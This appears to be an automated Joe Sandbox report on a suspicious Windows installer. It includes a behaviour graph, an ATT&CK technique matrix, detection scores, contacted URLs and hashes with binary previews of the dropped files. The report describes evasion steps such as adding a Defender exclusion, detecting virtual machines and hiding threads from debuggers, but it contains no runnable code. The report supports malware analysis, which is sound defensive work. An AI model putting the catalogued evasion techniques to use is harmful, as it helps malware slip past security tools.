Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0046AB2A GetSystemTimeAsFileTime,10_2_0046AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00500090 GetVersion,10_2_00500090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579605 Sample: #U5b89#U88c5#U52a9#U624b_1.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 76 90 Found driver which could be used to inject code into processes 2->90 92 PE file contains section with special chars 2->92 94 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->94 10 #U5b89#U88c5#U52a9#U624b_1.0.9.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_1.0.9.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 96 Adds a directory exclusion to Windows Defender 19->96 35 #U5b89#U88c5#U52a9#U624b_1.0.9.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_1.0.9.tmp 4 16 35->55         started        98 Loading BitLocker PowerShell Module 38->98 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\trash (copy), PE32+ 55->82 dropped 84 3 other files (none is malicious) 55->84 dropped 100 Query firmware table information (likely to detect VMs) 55->100 102 Protects its processes via BreakOnTermination flag 55->102 104 Hides threads from debuggers 55->104 106 Contains functionality to hide a thread from the debugger 55->106 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_1.0.9.exe6%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b_1.0.9.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-TAP4G.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
    unknown
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_1.0.9.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
          unknown
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
              unknown
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drfalse
                    unknown
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579605
                    Start date and time:2024-12-23 05:06:09 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 17s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                    renamed because original name is a hash value
                    Original Sample Name:_1.0.9.exe
                    Detection:MAL
                    Classification:mal76.evad.winEXE@141/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 75
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    23:07:00API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp modified
                    23:07:03API Interceptor26x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                        #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                          ekTL8jTI4D.msiGet hashmaliciousUnknownBrowse
                            C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):831200
                              Entropy (8bit):6.671005303304742
                              Encrypted:false
                              SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                              MD5:84DC4B92D860E8AEA55D12B1E87EA108
                              SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                              SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                              SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                              • Filename: ekTL8jTI4D.msi, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999161200123711
                              Encrypted:true
                              SSDEEP:6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
                              MD5:6B02F0DA3BB2B4FE892A9A462B66FF7C
                              SHA1:5C9453562989CC675FBC88545BE306EF5CB09EF2
                              SHA-256:58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
                              SHA-512:3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
                              Malicious:false
                              Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Joe Sandbox View:
                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999161200123711
                              Encrypted:true
                              SSDEEP:6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
                              MD5:6B02F0DA3BB2B4FE892A9A462B66FF7C
                              SHA1:5C9453562989CC675FBC88545BE306EF5CB09EF2
                              SHA-256:58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
                              SHA-512:3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
                              Malicious:false
                              Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.997011252064675
                              Encrypted:true
                              SSDEEP:1536:MsEZo4RLSOELwdAAOTXo+Pqyq5P5J74UmnNap/FOtP08J:8y4RLddAAOTXoKqZZQn1
                              MD5:DB0ACE7AA74DAA24BB781119C3C869AE
                              SHA1:07A3730409AFB5070EC735425E77B492B6EBA129
                              SHA-256:3FF34DB386F861828A302E5A4AD3E57409CAA8D4CCF5C867F80C2C8B514AF30D
                              SHA-512:8FDBB6D6D195AB1EE949DBD855D4E6B1E58EEFF7191D667E9A8737C27A2ED0326AF905496CC61156FE48B2443FA1846DE668C5630F200E3408981B3AB439395C
                              Malicious:false
                              Preview:.@S.....Q..l ...............L......h..|y}.......O..Fo.u.+..+.j.ca..v.@.....&....c[/.f..E.....o*Ck.\......J...v.o.N..J.._._\Y.1.-..f/....K.....}"..i.|h.[..y1.1w...k.t..L.....V..<.X.........P..(...~q.$..Z...r$....}......-.D.....&.?K..u3.7.....0.....vi6{{.....S..}...*..%./....B[...uc..o....h9?.Pl.....}.q'.....N.-..:.....-(...8.........=B.pah.n...1.Mdp~7@......%r.N3I...R.P.}=j.^......,.p.9.........L.e6....A.+.k]`f..;O.9/hU@........x...%&.C.YR.....n..IA..ZG*>......%.Y92..4z.....H....].9..K*..\O.o..^S.....P..B...!h...z.S..h.....7UkS."Exy}..q._c.,.19...>C..W.<RQ.v......U..h.....XpG.%.X.......}........_`....."L....G'g.. .*K...0..z.P..1..\......7..3....y...2........X...W...8......E.@Y[....Z.."..0..u.wC.M.+....`...%._m.F..}iC...C.{..4..:9......I..@C.y..s%.6.C.....=...f.a^...e...A..y..?.....n....W....k.J.{.......i(.{iZ.......Z`\....H....J..WT...+.....I..[O.._....k[..h..........A...1'..p.4.co...e...2.R..KIP.j.._.B...]!.as. ...1..8..@....q.7.h.$F.
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.99701125206467
                              Encrypted:true
                              SSDEEP:1536:DzeJcAKCT4h5YjqiOU+HyhjI3GKG0pY0e7zjuX+u:Dz4DtTfd/yvY0e7uJ
                              MD5:09A8667EA9E45CA2FDD69DB8D762B163
                              SHA1:0FADBFC5D02C59B7DB8C9CA9EB437FA7A6AE80FA
                              SHA-256:DACDD802F11565D9F8321D7884C8E865E6868EF1647794BFF17B063AB9234992
                              SHA-512:21A78AE277171BE6E3E6155F2753DA1E58C96AFD068BEE36884C91DF2BE831E225BC1652CCF56400311E6266749CEA1328B9BF4811C7A736BBE237C3E5D5DBDE
                              Malicious:false
                              Preview:7z..'...z..........2.......y.[....5..4....]2;G}l0.B.....r.E..V.O...(.8.r..^Q.....V...u..<...n.....7V.0..tw8~.m..~.f....\P.......K..(...13S.v.W:O...`y.4.....H....'.....1....s$[.I0Y...2q.cU.b.w._..gw...+p..j..T..>.f.M@^...-e,....~..}W.....^..H3.,L1:........)@kT.t..}>.[..N..Y(Pu...c.7..i_7/...0..sr.BO....ibJtN....T.H......RYn..X..Ifa\Z.f ..e...`...........WSq.t......p.[./.Z......y.;_<......`..j)..M...CT@i.{.~.....2.......q.HBL{....I...q.u....&.-..4..5......(.p........!...20<'....&...A..@....`:.......~z._.....N.2.%^.k.h];x..........O_....A..u..lf...+.a.....}!.gT].6,.<a..6n....pt.S.v.}n<Wj.{u~..0.4....../.M....._J...fL:u.V..&.:'.[..t..;'#K..z.[I6.of.b.....QK=.....@...PM.o...Vf..."*Ssh.3M'.K1._..&..}.q...~~..._.C.f..G.$&...m.m.Q.$..$...<.V6.Jg..*.......>...n"..'a.....O... .V..jR.."h..a...PD..aH...Dl2.Y..._W"3'.R..f...Y/...[..L....*....>9...1B..:n~,.M.T[%.G2....t.7nt..)".X]..<.nD.....@..IO.d. ..g ...-um.*."-...s.d!.Q...^...u.?.4.\l.#'{..H_......?.x
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255975
                              Encrypted:true
                              SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                              MD5:CEA69F993E1CE0FB945A98BF37A66546
                              SHA1:7114365265F041DA904574D1F5876544506F89BA
                              SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                              SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                              Malicious:false
